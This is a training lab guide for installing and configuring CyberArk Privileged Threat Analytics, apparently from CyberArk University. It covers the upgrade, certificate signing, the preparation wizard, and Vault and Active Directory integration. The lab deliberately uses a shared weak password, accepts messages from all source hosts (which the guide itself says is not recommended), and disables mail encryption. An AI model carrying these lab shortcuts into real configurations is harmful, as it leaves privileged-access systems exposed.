PTA IC Exercise Guide v12.2.3

CyberArk Privileged Threat Analytics
Install & Configure

CyberArk Privileged Threat Analytics – Install & Configure
CyberArk University
Privileged Threat Analytics Exercise Guide
Exercise Guide
CONTENTS
INTRODUCTION ..................................................................................................................................................... 6
USING SKYTAP...............................................................................................................................................................6
INTERNATIONAL USERS ...................................................................................................................................................8
CONFIGURING THE PRIMARY PTA SERVER ........................................................................................................... 12
UPGRADING TO VERSION 12.2 .......................................................................................................................................12

Copy the upgrade files to PTAServer1 ................................................................................................................13
Connect to PTAServer1 via PSM .........................................................................................................................14
GETTING A CERTIFICATE FOR THE PTA SERVER...................................................................................................................15
Generating a CSR................................................................................................................................................16
Signing the CSR...................................................................................................................................................18
Install certificates to the PTA Server ..................................................................................................................20
RUNNING THE PREPARATION WIZARD..............................................................................................................................22
Step 1/18 – End User License Agreement...........................................................................................................22
Step 2/18 – Change PTA root user password .....................................................................................................23
Step 3/18 – Network configuration ....................................................................................................................23
Step 4/18 – Domain names mapping configuration ..........................................................................................24
Step 5/18 – Date and time zone configuration ..................................................................................................24
Step 6/18 – Database initialization ....................................................................................................................24
Step 7/18 – Configuring internal components ...................................................................................................24
Step 8/18 – PAS connection configuration .........................................................................................................25
Step 9/18 – Loading user and safe activities report ...........................................................................................26
Step 10/18 – Baselines creation .........................................................................................................................26
Step 11/18 – Loading inventory report ..............................................................................................................27
Step 12/18 – Authorized source hosts configuration .........................................................................................27
Step 13/18 – Network sensor and PTA Agent connection configuration ...........................................................28
Step 14/18 – Golden Ticket detection configuration ..........................................................................................28
Step 15/18 – Email notifications configuration ..................................................................................................28
Step 16/18 – PTA maintenance user configuration ............................................................................................29
CyberArk University Exercise Guide Page 2
3/21/2022
© Cyber-Ark® Software Ltd - No part of this material may be disclosed to any person or firm or reproduced by any means, electronic and
mechanical, without the express prior written permission of Cyber-Ark® Software Ltd.
Step 17/18 – Deploying Web Application...........................................................................................................29

Step 18/18 – PTA initialization ...........................................................................................................................30
FIRST LOGIN TO THE PTA DASHBOARD.............................................................................................................................30
INTEGRATIONS .................................................................................................................................................... 34
VAULT INTEGRATION ....................................................................................................................................................34

ACTIVE DIRECTORY.......................................................................................................................................................35
PVWA ......................................................................................................................................................................37
PSM .........................................................................................................................................................................38
WINDOWS AGENT – EVENT FORWARDING .......................................................................................................... 41
INSTALLING THE WINDOWS AGENT .................................................................................................................................41

Running the PTA Agent Script Creator ...............................................................................................................41
Running the PTA Agent Installer ........................................................................................................................42
VERIFYING THE INSTALLATION .........................................................................................................................................42
TESTING THE INITIAL CONFIGURATION ................................................................................................................ 45
PREPARING THE ENVIRONMENT ......................................................................................................................................45

RootXX Users ......................................................................................................................................................45
Last CyberArk Login ............................................................................................................................................46
UNMANAGED PRIVILEGED ACCESS ..................................................................................................................................46
SUSPECTED CREDENTIAL THEFT AND AUTOMATIC PASSWORD ROTATION ................................................................................48
SUSPICIOUS PASSWORD CHANGE AND AUTOMATIC RECONCILIATION .....................................................................................51
SUSPICIOUS ACTIVITIES IN A WINDOWS SESSION AND AUTOMATIC SUSPENSION ........................................................................54
Create the Rule ...................................................................................................................................................54
Test the Rule .......................................................................................................................................................54
SUSPICIOUS ACTIVITIES IN AN SSH SESSION AND AUTOMATIC TERMINATION ............................................................................57
SECURITY RULES EXCEPTIONS .........................................................................................................................................58
AUTOMATIC ONBOARDING RULES ...................................................................................................................................60
Modify the target Safe permissions ...................................................................................................................60
Create a new rule ...............................................................................................................................................61
Test the rule .......................................................................................................................................................62
INSTALLING THE AGENT ON A DOMAIN CONTROLLER ......................................................................................... 63
INSTALLING THE PTA AGENT ..........................................................................................................................................63

Running the PTA Agent Script Creator ...............................................................................................................63
Running the PTA Agent Installer ........................................................................................................................64
VERIFYING ..................................................................................................................................................................65
RUNNING AGENTSHELL..............................................................................................................................................67
KERBEROS ATTACKS ............................................................................................................................................. 69
OVERPASS-THE-HASH ...................................................................................................................................................69
3/21/2022
Allow the PTA to perform automatic password rotation ...................................................................................69

The attack begins ...............................................................................................................................................70
The victim connects ............................................................................................................................................71
The attack continues ..........................................................................................................................................71
The response ......................................................................................................................................................73
DCSYNC.....................................................................................................................................................................75
The attack ..........................................................................................................................................................75
The response ......................................................................................................................................................76
GOLDEN TICKET ...........................................................................................................................................................77
Configuring Golden Ticket attack detection .......................................................................................................77
The attack ..........................................................................................................................................................79
The response ......................................................................................................................................................80
ACTIVE DIRECTORY RISKS..................................................................................................................................... 81
EXPOSED CREDENTIALS .................................................................................................................................................81

UNCONSTRAINED DELEGATION .......................................................................................................................................83
MANAGING PTA ACCOUNTS WITH CYBERARK ..................................................................................................... 84
MANAGING THE PTA ADMINISTRATOR (WEB DASHBOARD) ................................................................................................84
TROUBLESHOOTING............................................................................................................................................. 86
SHORTCUTS UTILITY .....................................................................................................................................................86

CHANGING LOG LEVELS .................................................................................................................................................87
EXPORT TOOL (CYBERARK SUPPORT) ...............................................................................................................................88
PTA DR SERVER .................................................................................................................................................... 89
GETTING A CERTIFICATE ................................................................................................................................................89

Creating the CSR .................................................................................................................................................89
Signing the CSR...................................................................................................................................................90
Installing the Certificate and its Chain ...............................................................................................................91
9 STEPS .....................................................................................................................................................................92
PRIMARY SETUP ..........................................................................................................................................................93
CHECK THE CONFIGURATION ..........................................................................................................................................94
FAILOVER TO PTA DR SERVER ........................................................................................................................................95
OPTIONAL EXERCISES ........................................................................................................................................... 97
BRING PTASERVER1 BACK ON-LINE AS THE DR SERVER .......................................................................................................97

GOLDEN TICKET ATTACK USING MIMIKATZ .......................................................................................................................97
APPENDIX .......................................................................................................................................................... 101
SHORTCUTS.SH ..........................................................................................................................................................101
3/21/2022
3/21/2022
CyberArk Privileged Access Security – Administration
Introduction
Using Skytap
Before beginning exercises, here are a few tips to help you navigate the lab more
effectively.
1. Click the large monitor icon to connect with the HTML5 client
2. Use the Ctrl-Alt-Del button on the tool bar to send a Ctrl-Alt-Del to the machine
3. The clipboard icon will allow you to copy and paste text between your computer and
your lab machine. Do NOT copy parameters or settings from a PDF file into the
environment. It does not work.
3/21/2022
4. The full screen icon will resize your lab machine to match your computer’s screen
settings to avoid scrolling
5. You may need to adjust your bandwidth setting on slower connections
3/21/2022
International Users
By default, the lab machines are configured to us a US English keyboard layout. If you
use a machine from a country other than the US, you may experience odd behavior from
your lab machines. The solution is to install the keyboard layout for your keyboard on our
lab machines. Follow the process below to find and configure the correct keyboard layout
for your keyboard.
1. From the Start Menu launch Add a language.
2. Click Add a language
3/21/2022
3. Select your Language, thereafter click Open
4. Select your specific locality or dialect, thereafter click Add
3/21/2022
5. If you use an alternate keyboard layout (e.g. AZERTY, Dvorak) you can click options
next to your language to install, if not, close the Language window
6. In the system tray, click ENG, then choose your keyboard layout
7. You may switch back and forth between keyboard layouts (Your instructor may need
to switch back to ENG to help you with exercises, occasionally)
3/21/2022
3/21/2022
Configuring the Primary PTA Server

In this first section, we will configure the primary PTA server in our environment. This
server was deployed as a virtual appliance from an image provided by CyberArk. Our
goal is to integrate this generic server into our corporate network.
Our first tasks are to:
• Upgrade the main PTA to version 12.2.3

• Get a signed certificate for our first PTA Server
• Perform the initial configuration of this device for our ACME.corp environment
using the one-time Preparation Wizard
• Connect the PTA to our existing CyberArk Privileged Access Manager
environment
We will be performing our work as the Active Directory user Mike (password Cyberark1).
We will log into the machine Components with this account and also use it to log into the
PVWA.
Our primary PTA server is PTAServer1, whose IP address is 10.0.0.2. We will connect to
it through PSM connections launched in the PVWA. In that way, all our actions on the
PTA will be recorded and auditable.
Ensure that all the VMs in Skytap – with the exception of PTAServer2 (we will start this
later) – are running before beginning the exercises.
Upgrading to version 12.2
As a first step, we will upgrade the PTA software on a CentOS Server. To do this, we will:
• Copy the upgrade files from the local drive on the Components server to the /tmp
directory on ptaserver1.
• Connect to ptaserver1 via the PSM.
• Modify the execution permissions on the upgrade script.
• Run the upgrade script.
Note: We have added the upgrade exercise here primarily to demonstrate how easy it is to
deploy a PTA.
3/21/2022
Copy the upgrade files to PTAServer1
To perform this first step, we will connect to ptaserver1 with WINSCP via the PSM.
1. Login to the server Components as Mike (password is Cyberark1). Launch the

Chrome browser (there is a shortcut in the task bar).
2. On the CyberArk home page, select LDAP as the authentication method.
3. When prompted, enter Mike and his LDAP password: Cyberark1
Note: You should be connected as the user Mike (password Cyberark1) to the server
Components. You should imagine that you are the Vault administrator and that
you are logged into your own workstation.
4. Find the account root for ptaserver1.acme.corp and open a connection using
WinSCP.
3/21/2022
5. In the WinSCP window, on the left-hand side, browse to C:\PTA Course\PTA-

Installer-Rls-v12.2.3. This is local drive on the Components server. On the right-
hand side, browse to /tmp. This is a temporary directory on the PTA server.
6. Select and drag the two files pta_installer.sh and pta-12.2.3.0.tgz from the left to the
right, copying them to the /tmp directory.
7. When you have finished, you can close the WinSCP window, but leave the PVWA
open.
Connect to PTAServer1 via PSM
As our next task, we will open a PSM connection to the PTAServer, and run the upgrade
script to bring the primary PTA up to the same version as our CyberArk PAM installation.
1. Go back to the account root for ptaserver1.acme.corp and open an SSH

connection.
2. Change directory to /tmp and run the command to enable execution:
cd /tmp/
chmod 700 pta_installer.sh
3. Next, execute the installation script.
3/21/2022
./pta_installer.sh
4. You will be prompted to continue. Enter y and hit Enter.
5. It will take a moment to extract the files. You will then receive a message saying it is
best to perform a snapshot before executing an upgrade. We will skip the snapshot,
so enter lower-case y and hit Enter to proceed with the upgrade.
Welcome to Privileged Threat Analytics version 12.2.3 installation

tool.
CyberArk Privileged Threat Analytics may include certain third-party
components. Their licenses and acknowledgements are listed in the
About window in the CyberArk Privileged Threat Analytics dashboard.
Do you want to continue?[Y/N] y
The upgrade process will take a few minutes, enough time to go fetch a coffee or a tea.
At the end of the process, you will be advised to restart the server, type:
shutdown -r now
This will reboot the server, end the remote session, and close Putty.
Getting a Certificate for the PTA Server
We want all communication with the PTA servers to be secured and encrypted, which
means we will need to get PKI certificates for each of our servers: ptaserver1, which is
our primary server, and ptaserver2, which is our disaster recovery server.
Additionally, there is a DNS alias ptaserver that re-directs to either 10.0.0.2 or 10.0.0.3
(whichever responds). Our clients (other servers and end users) will be given the address
for the DNS alias – ptaserver.acme.corp as the target address, so each of our PTA
servers must be able to identify itself as either itself or the DNS alias. To achieve this, we
will use the Subject Alternative Name (SAN) parameter in the certificate.
The CyberArk PTA has a built-in mechanism for generating certificate requests. We will:
• Generate a certificate signing request (CSR) for our first PTA server
• Submit that request to the Cyber-Ark-Demo Certification Authority for
signature
• Import the signed certificate into the ptaserver1 machine
3/21/2022
Generating a CSR
In this section, we will use a PTA utility to generate a certificate signing request, or
CSR.
1. On the Components server, log into the PVWA as Mike and open another SSH
connection with account root to ptaserver1.acme.corp.
2. Go to the following directory and launch the PTA Utility tool:
/opt/tomcat/utility/run.sh
Note: You can jump to this directory with the PTA shortcut UTILITYDIR
3. Enter 14 as your menu option: Generating a Certificate Signing Request (CSR).

This will launch a wizard that will guide us through the CSR creation process.
4. Enter the host name (the DNS alias) of the PTA Host Name: ptaserver.acme.corp
5. Enter the Organization name: ACME
6. Enter the department name: Training
7. Enter the City name: Boston
8. Enter the State: MA
9. Enter the Country code: US
10. PTA Server shared FQDN: ptaserver.acme.corp
11. Enter the Subject Alternative Names as shown below:
dns:ptaserver1.acme.corp,ip:10.0.0.2
The whole process should look like the screen below. The data entered has been
highlighted for clarity.
Your action: 14
Action in progress...
[Step 1/1 - CertificateSigningRequestGenerationUtil]
Installation of the certificate will restart the PTA application.
3/21/2022
Generating a Certificate Signing Request (CSR) - Please specify the

certificate details:
PTA Host Name: ptaserver
Organization: ACME
Department: Training
City: Boston
State: MA
Country Code: US
PTA Server shared FQDN (for Disaster Recovery mode, optional):
ptaserver.acme.corp
Subject Alternative Names (Example: dns:<DNS_NAME>,ip:<IP_ADDRESS>):
Certificate Signing Request (CSR) created successfully.
-----BEGIN NEW CERTIFICATE REQUEST-----

MIIDVDCCAjwCAQAwaTELMAkGA1UEBhMCVVMxCzAJBgNVBAgTAk1BMQ8wDQYDVQQH
EwZCb3N0b24xFTATBgNVBAoTDEN5YmVyQXJrRGVtbzERMA8GA1UECxMIVHJhaW5p
bmcxEjAQBgNVBAMTCXB0YXNlcnZlcjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
AQoCggEBAJcwzAaA8RgRGqFBmj7Eylhaiotm0wjmSkd8dODOAg5wNN8wAdfpaupG
og+QXUTji+G+T6GonCzcr3AHhnQrmG5WQYd23+oHuNf8CTHsZJjF0nasi7xx5oEv
AbQVocB1wLeENaJwtMkuxxVnSQG8RvyDIm7WQLCIADFG57avEItjdQdeeMB08gzl
L5884oUriMrfx7AE1P3rLPjRCyyM+0Bg8Y5eKb9EqgCK04Vl4qS960XTLONtca3Z
bqJgodyUbfSskKQLx3j63EZuuxuDmUjH/ndkEMfHPXJJg1Q/uCJ+kvn0lKWezIUP
AsFntEEw4+eom+/2MZzACr/aMWxL5yUCAwEAAaCBpTCBogYJKoZIhvcNAQkOMYGU
MIGRMHAGA1UdEQRpMGeCHnB0YXNlcnZlci5jeWJlci1hcmstZGVtby5sb2NhbIIe
cHRhc2VydmVyLmN5YmVyLWFyay1kZW1vLmxvY2Fsgh9wdGFzZXJ2ZXIxLmN5YmVy
LWFyay1kZW1vLmxvY2FshwQKAAABMB0GA1UdDgQWBBRnLU2a84Eeu9vycGdwi5hy
K8UDLDANBgkqhkiG9w0BAQsFAAOCAQEAMlGaAsWK8TZPK+Oopor6vZFecyHsEkP4
rTq8qsbd/BZ0lP50+Sh8cB8jzeO/T5ZbLdbFDJcdzstglZN04PfNUJVcMxq/meq0
Nso1GXPhIlmZ4LRy+4UdP8A2x2Z8OpA+WCC/jK6BjiGPREKOG0Q2OaX8mG5+ei3A
tmTf7ZsvzZPSAtFPgpvYp4wlGyE2hp5RNK5+zHtSYIMCs90IlqGeabOflKZy1CgC
wLNckBMk+LhtzIp9L9fkT0kLc8l49pZDR95talemvcleAepoOEik0svI7bk/ckG0
JqFMS4S9AMOSt4uL3CMlN5a8Coqcg+aNFJm0y4xoWGvXlIrZ+A0HFQ==
-----END NEW CERTIFICATE REQUEST-----
Contact your security representative to create a Certificate Chain

(Root, Intermediate(s), PTA Server certificates)
Action completed
Exiting utility.
[root@PTAServer utility]#
Copy the CSR information in the PuTTY window (highlighted in green above) to Notepad.
You can do this by selecting the text in the PuTTy window, hitting Enter, and then pasting
the text into Notepad.
Leave the PuTTY session open.
3/21/2022
Note: If you prefer, you can use WinSCP to get the generated CSR file from the PTA
server. Use the root account on 10.0.0.2 in the PVWA. The file is located at
/opt/tomcat/ca/ptaserver.csr.
Signing the CSR
In this section, we will submit the CSR for signature to the Microsoft Active Directory
Certificate Services for ACME.corp.
1. Launch Internet Explorer (there is a shortcut in the task bar). You should
automatically arrive at the following site:
https://dc01.acme.corp/certsrv
2. Click Request a certificate.
3. Click advanced certificate request and then Submit a certificate request by

using a base-64…
4. Copy all the contents of the CSR and paste it into the relevant box as shown below
and select ACME Server from the Certificate Template drop down menu.
3/21/2022
5. Click Submit. You will be asked to confirm the creation of a certificate. Click Yes.
6. In the next screen, select Download certificate, making sure DER encoded is
selected.
3/21/2022
7. Save the file as pta.cer to c:\CYBR_Files, replacing the file that is there.
Note: You should now have two certificate files in your CYBR_Files folder: pta.cer and
acme.cer. The latter file is the certificate for the Root Authority and the two files
together represent the entire authority chain.
Install certificates to the PTA Server
In this section, we will upload our new certificate (pta.cer) and the certification authority
Root CA certificate (acme.cer) to the PTA server, and then run a script to associate these
certificates with our PTA server.
Warning: This process is not tolerant of mistakes. As you proceed, enter the information
carefully and then double-check that you have entered the correct information
before hitting the Enter key. If you make an error, you will have to start again from
the beginning and generate a new CSR. You have been warned.
1. Open another connection to the ptaserver1, this time using WinSCP as root to
ptaserver1.acme.corp (via the PSM, of course) and copy both certificate files –
pta.cer and acme.cer – from C:\CYBR_Files\ to the PTA server, placing them in the
/tmp/ folder.
3/21/2022
Note: Make sure you place them in /tmp and not a sub-directory by accident.
2. You can close the WinSCP connection and switch back to the SSH connection,
which should still be open. We are going to run the same script again from the
UTILITYDIR folder:
./run.sh
3. This time choose option 15. Installing SSL Certificate Chain. Here, we will:
• Provide the path to the ptaserver server certificate: /tmp/pta.cer

• Say ‘yes’ to the Root certificate
• Provide the path to the root certificate: /tmp/acme.cer
• Say ‘no’ to the intermediate certificate
Your action: 15
Action in progress...
[Step 1/1 - SSLCertificateInstallationUtil]
This step requires Vault Admin credentials using CyberArk

authentication, and a restart of PTA services.
3/21/2022
Installing SSL Certificate Chain (Root, Intermediate(s), PTA Server

certificates):
Specify PTA Server Certificate full path: /tmp/pta.cer
Do you have a Root Certificate (y/n)?: y
Specify your Root Certificate full path (for example:
/tmp/RootCertificate.crt): /tmp/acme.cer
Do you have Intermediate certificate(s) (y/n)?: n
SSL Certificate Chain installed successfully.

Restarting PTA services...
Action completed
Exiting utility.
[root@PTAServer utility]#
Note: Although it states that this step requires Vault Admin credentials, it does not prompt
for authentication. You can ignore this.
Running the Preparation Wizard
The Preparation Wizard, or PrepWiz, is a script that you run on the PTA server to
integrate it with your corporate environment. There are 18 steps in the process and we will
walk through them in this section.
If you are not still connected to PTAServer1, in Components launch a Putty via the PSM
session using the root account on ptaserver1.acme.corp.
1. Run the following CyberArk PTA shortcut command to jump to the PrepWiz folder:
PREPWIZDIR
2. You are now in /opt/tomcat/prepwiz. Run the PrepWiz script:
./run.sh
Step 1/18 – End User License Agreement
First you need to accept the terms of CyberArk’s End User License Agreement. Type y
and then press Enter to accept the EULA (End User License Agreement).
[Step 1/18 - End User License Agreement]
3/21/2022
Please read CyberArk's Privileged Threat Analytics End User License

Agreement, which determines the terms of use of this software and all
of its components.
CyberArk's Privileged Threat Analytics may include certain third party
components, which are listed in the About window in the Privileged
Threat Analytics dashboard.
To install CyberArk's Privileged Threat Analytics, you must accept the

End User License Agreement which you can view at
/opt/pta/utility/EULA.
Do you accept all terms of this agreement (y/n)? y
End User License Agreement accepted successfully.
Step 2/18 – Change PTA root user password
Nothing to do here. We can move on to the next step.
[Step 2/18 - Change PTA root user password]
The root password is not the default password, no password change is

required.
Step 3/18 – Network configuration
In this step, the Wizard detects our PTA server’s current IP address – 10.0.0.2 – type n
and hit Enter not to change this value. The system then detects our current DNS server
and we do not need to enter the IP addresses of any additional DNS servers as we only
have one: 10.0.0.1, so enter n and hit Enter.
[Step 3/18 - Network configuration]
Found existing IP address: 10.0.0.2

Would you like to change the IP Address (y/n)?: n
IP configuration finished successfully
DNS configuration
Found existing DNS server: 10.0.0.1
Testing configuration... ping - to perform verification of DNS
Configuration test was completed successfully
Would you like to specify an additional DNS server (y/n)? [n]: n
Make sure the configuration test completes successfully.
3/21/2022
Step 4/18 – Domain names mapping configuration
Press n and then Enter as we will not need cross-domain configuration
[Step 4/18 - Domain names mapping configuration]
PTA requires a list of each domain name with its corresponding NETBIOS
(pre-Windows 2000) name to better identify each domain name in the
data.
You must perform this step for each domain in each Active Directory
that is monitored by PTA. For more information specify 'help'.
Would you like to specify domain names mapping configuration (y/n)?: n
Step 5/18 – Date and time zone configuration
We will use the time zone for London – right/Europe/London – which is the zone set for
our virtual machines. We will also enter the date and time manually (use the time on your
Windows server) and we will say no to synchronizing with an NTP server.
[Step 5/18 - Date and time zone configuration]
Specify your time zone (example: America/Chicago). For a full time

zone list, specify 'help'.
Time zone: right/Europe/London
Specify current date and time in 24h format "MM/DD/YYYY hh:mm"

(example: 11/21/2013 16:20): 03/09/2022 10:05
Do you want to synchronize with an NTP server (y/n)? [n]: n
Date and time zone configuration finished successfully.
Step 6/18 – Database initialization
There is nothing to do in this step.
[Step 6/18 - Database initialization]
Database is already running.

Database initialization finished successfully.
Step 7/18 – Configuring internal components
There is nothing to do in this step.
[Step 7/18 - Configuring internal components]
3/21/2022
Configuring internal components finish successfully.
Step 8/18 – PAS connection configuration
This is an optional step that we will perform. There are a number of sub-steps, so we will
break it down.
First, we say ‘yes’ y to the optional step and then configure the connection to the Vault,
providing the IP address 10.0.10.1, the port (accept the default), enter n to say no to
configuring a DR Vault.
Then we provide the user name and password of a CyberArk user with the rights to create
safes and users (we will use the built-in Administrator account and the password
Cyberark1).
Next, we confirm our time zone
Note: In the section below, we have inserted xxxxxxxxx to show where you need to enter
the password, however these x’s will not actually appear.
[Step 8/18 - PAS connection configuration]
This step is optional. Would you like to configure it (y/n)? [y]: y

Establish connectivity between PTA and the Vault to authorize the
Vault as a source host. This is a prerequisite for:
Forwarding data from the Vault
Retrieving Vault reports
Configuring Golden Ticket detection
Specify the Vault server's IP address and port number.
IP: 10.0.10.1
Port: [1858]
Would you like to configure Vault DR (y/n)? n
Specify Vault Admin credentials using CyberArk authentication.
This user must have administrator permissions, and it will be used to
update the environment required for the PTA in the Vault server.
Vault Admin username [Administrator]:
Vault Admin password:xxxxxxxxx
Retype Vault Admin password:xxxxxxxxx
Creating PTA Vault user.
PTA Vault user created successfully.
Creating PTAApp Vault user.
PTAApp Vault user created successfully.
Specify your vault time zone (example: America/Chicago). For a full
time zone list, specify 'help'.
Time zone [right/Europe/London]:
3/21/2022
Is your vault installed in a cluster or distributed environment?

(y/n)? n
Vault configuration finished successfully.
Establish connectivity between PTA and the PVWA. Would you like to
configure this (y/n)? [y]:
By default, the PTA connection with PVWA is verified and trusted,
using a pre-configured PVWA certificate chain installed in PTA.
Note: If you have not installed the PVWA certificate chain in PTA,
click ctrl+C to exit the PTA installation wizard, run
/opt/tomcat/utility/sslClientCertificateChainInstallationUtil.sh to
install the certificate chain in PTA, and run the PTA installation
wizard again.
Would you like to keep the trusted connection between PTA and PVWA
(y/n)? [y]:
Enter PVWA address (example: pvwa.domain.com): pvwa.acme.corp
Https enabled (y/n)? [y]:
PVWA port [443]:
PVWA application root context [PasswordVault]:
Testing PVWA connection...
Connection completed successfully
Step 9/18 – Loading user and safe activities report
Here we will say yes to loading the user and safe activities from the Vault to the PTA
database and confirm the number of days (180) of activities. This step provides the PTA
with the activity history of the Vault prior to the installation of the PTA. If you were to say
‘no’ to this option, the PTA would be starting off with a blank slate, as it were.
[Step 9/18 - Loading user and safe activities report]
This step is optional. Would you like to configure it (y/n)? [y]:

Specify the number of previous days that will be included in the user
and safe activities report.
Number of days [180]: 180
Generating the user and safe activities report...
Loading the user and safe activities report...
User and safe activities report loading was completed successfully.
Step 10/18 – Baselines creation
In this step we confirm the creation of a behavior profile for what is considered “normal”.
[Step 10/18 - Baselines creation]

Creating baseline for 'Privileged access during irregular hours'
algorithm...
3/21/2022
Baseline created successfully
Creating baseline for 'Excessive access to privileged accounts'

algorithm...
Creating baseline for 'Accessing the Vault from irregular IP'

algorithm...
Baselines creation finished successfully.
Step 11/18 – Loading inventory report
Here we confirm the loading of the inventory report.
[Step 11/18 - Loading inventory report]

Generating the inventory report...
Loading the inventory report...
Inventory report loading was completed successfully.
Step 12/18 – Authorized source hosts configuration
This step configures which IP addresses are authorized to forward information to the PTA.
We will accept from all addresses (although this is NOT the recommendation), so enter All
and hit Enter.
[Step 12/18 - Authorized source hosts configuration]
Specify the source host IPs that are authorized to forward messages to
PTA, separated by a comma (for example: 11.22.33.44,11.22.33.55).
To allow all hosts types to forward messages to PTA, specify 'All'.
To prevent any host type from forwarding messages to PTA, specify
'None'.
PTA should only be permitted to receive messages from authorized

sources such as organizational SIEM solutions and any other server
that sends messages directly to PTA.
If the Vault connection was configured, the Vault is automatically
considered to be an authorized source host (no need to specify it in
this step).
Authorized machines: All

Authorized source hosts configuration finished successfully.
3/21/2022
Step 13/18 – Network sensor and PTA Agent connection configuration
We will say yes to perform this optional step. We will say yes to the use of PTA agents.
We will say no to the installation of a network sensor machine.
[Step 13/18 - Network sensor and PTA Agent connection configuration]
This step is optional. Would you like to configure it (y/n)?: y

The PTA Server can be configured to collect network traffic with
agents installed on your DC's or with Network Sensor machines or with
both.
Will your implementation include PTA agents? (y/n): y
The Server configuration for PTA agents was configured successfully.
After completing the PTA Server installation, you must install the PTA
agents.
Will your implementation include PTA network Sensor machines? (y/n): n
Step 14/18 – Golden Ticket detection configuration
Here we will skip Golden Ticket configuration. We will configure it manually later.
[Step 14/18 - Golden Ticket detection configuration]
This step is optional. Would you like to configure it (y/n)?: n

Golden Ticket detection configuration skipped.
Step 15/18 – Email notifications configuration
We will perform this optional step. We will skip encrypting the connection and then we will
enter the IP address of our mail server (10.0.0.1), confirm the default port (25), enter a no-
reply email address for the sender (CyberArk_PTA@cyber-ark-demo.local) and the
group address for the receiver of notifications (cyberarkvaultadmins@cyber-ark-
demo.local), and say no to mail server authentication. Finally, we will say ‘yes’ to a test
email. You will find a shortcut to the email server in your browser. Connect with the
account Mike with the password Cyberark1 and you should receive a test mail (see the
image below).
[Step 15/18 - Email notifications configuration]

We recommend that you configure email integration in a secure method,
which requires the exchange certificate to be installed in PTA prior
to running this step.
Email encryption method (starttls/ssl/none)? [starttls]: none
Specify the email server address: 10.0.0.1
3/21/2022
Specify SMTP port [25]:

Specify the sender's email address (in the following format:
user@domain.com): CyberArk_PTA@acme.corp
Specify the recipient's email address (in the following format:
user@domain.com). Separate multiple addresses with ';' (semi-colon):
cyberarkvaultadmins@acme.corp
Does the mail server require authentication (y/n)? [y]: n
Verifying email configuration...
Email configuration verification completed successfully. Test email
sent to configured attendees.
Was the test email received (y/n)? [y]:
Email notifications configuration finished successfully.
Step 16/18 – PTA maintenance user configuration
In this step we will create a password for the PTA maintenance user ptauser. We will use
Cyberark1.
[Step 16/18 - PTA maintenance user configuration]
Creating a user for system maintenance.

Specify a password for this user:xxxxxxxxx
Retype password:xxxxxxxxx
PTA maintenance user was created successfully.
Step 17/18 – Deploying Web Application
Nothing to do here. This step launches automatically after the previous step.
3/21/2022
[Step 17/18 - Deploying Web Application]
Deploying the Web application finished successfully.
Step 18/18 – PTA initialization
Finally, we will choose yes to initialize the PTA.
[Step 18/18 - PTA initialization]
This step is optional. Would you like to configure it (y/n)?[y]: y

Starting PTA
PTA services will automatically restart. This will take a couple of minutes at the end of
which you should see the following message:
PTA initialization finished successfully.
This step may take a moment, so be patient.
When everything is finished, restart the PTA server using:
shutdown -r now
First Login to the PTA Dashboard
In this section, we are going to log in to the PTA web dashboard, perform a required
password change, and upload the license file.
1. Connect to ptaserver1.acme.corp as root and go to /opt/tomcat/utility.
Tip: You can use the CyberArk PTA shortcut command UTILITYDIR and go directly to
this location.
2. Run the command to reset the default Administrator password for the web console.
./resetPtaAdminPass.sh
3. You will be prompted to continue resetting the Administrator’s password, type y and
then Enter.
4. Type in Cyberark1 as the password and then hit Enter and then retype Cyberark1 to
confirm the password and then hit Enter to confirm
3/21/2022
5. Open a browser and navigate to the PTA dashboard – https://ptaserver.acme.corp

(In Chrome, click on the PTA bookmark). The first connection might take a minute.
You can refresh if it takes too long.
6. Running the password reset requires entering a new password at first log in. Enter
the following credentials:
• Username: administrator
• Password: Cyberark1
7. You will now need to set a new password. Use the following as the new password:
CyberArk1234. You will need to enter the password twice.
3/21/2022
8. In the next window you will need to upload the PTA License. Use the browse button
and navigate to C:\PTA Course and select the file shown below to upload
PTA_NFR_CyberArkTraining_Until_2022-21-31.xml.
3/21/2022
9. If the page doesn’t refresh automatically, click the refresh button and you should
have access to the PTA dashboard as shown below:
3/21/2022
Integrations
In this section, we will configure the connections between the PTA and the following
components:
• Vault
• Active Directory
• PVWA
• PSM
Vault Integration
In this section, we are going to integrate the PTA with the Vault by adding a syslog section
to the file dbparm.ini and updating the Vault’s PTA.xsl file to version 12.2.3.
Two files for this purpose have been prepared for the training and are already in a Safe
named xfer in the Vault, so we will connect to the Vault server and download these two
files.
Note: The first time you log into the Vault Windows server after a restart, you will have to
allow a script to run via UAC.
1. In Skytap, go to the Vault server and log on as Administrator with password

Cyberark1.
2. Log in to the PrivateArk Client as Administrator. There is a Safe named xfer. Open
the Safe and download the files Syslog_PTA_dbparm.txt and PTA.xsl. Place them
on the desktop or wherever is convenient. You can close the PrivateArk Client.
3. In Windows Explorer, navigate to the Vault configuration folder:

C:\Program Files (x86)\PrivateArk\Server\Conf.
4. Open the dbparm.ini file using Notepad and replace the existing [SYSLOG] section
at the bottom of the file with the contents of the file Syslog_PTA_dbparm.txt:
[SYSLOG]
SyslogTranslatorFile=Syslog\PTA.xsl
SyslogServerPort=514
SyslogServerIP=10.0.0.2,10.0.0.3
SyslogServerProtocol=UDP
SyslogMessageCodeFilter=7,24,31,294,295,300,302,308,359,361,372,373,41
1,412,427,428,436,471,4624,4720,4723,4724,4732
UseLegacySyslogFormat=No
3/21/2022
5. Next, browse to the C:\Program Files (x86)\PrivateArk\Server\Syslog directory.

Delete the PTA.XSL file you find there and replace it with the one you downloaded
from the Vault.
6. Restart the Private Ark Server Service using Windows Services for the
configuration to take effect (say “Yes” to also restarting the Cyber-Ark Event
Notification Engine). Check ITALOG.log for errors before proceeding.
7. Once you have done this, you can log off the Vault server and return to
Components.
8. Login to the PTA Dashboard and you should now see Vault data coming through.
Active Directory
In this section, we will configure the PTA to connect to your organization’s Active Directory
server using LDAP/S.
1. Open a browser and connect to the PTA Dashboard from Components as

Administrator with the password CyberArk1234.
2. Go to the SETTINGS tab and click the AD Connectivity link in the left-hand pane.
3. In the Global Catalog server address field, enter the FQDN of the Active Directory
server: dc01.acme.corp.
4. Select Yes for the LDAP over SSL option. The value for the Global Catalog port
will change automatically to 3269.
3/21/2022
5. For the SSL certificate field, click the Browse button, go to the C:\CYBR_Files
directory and select the domain controller certificate acme.cer. Note that the path to
the file will appear as: C:\fakepath\acme.cer. This is normal.
6. In the User Principle Name field enter the name of the user account that will be
used to enable the PTA Server to scan the AD Server (the bind account):
bindaccount@acme.corp
7. Enter the password for the user: Cyberark1
8. In the LDAP PTA group field type in CyberArk Vault Admins
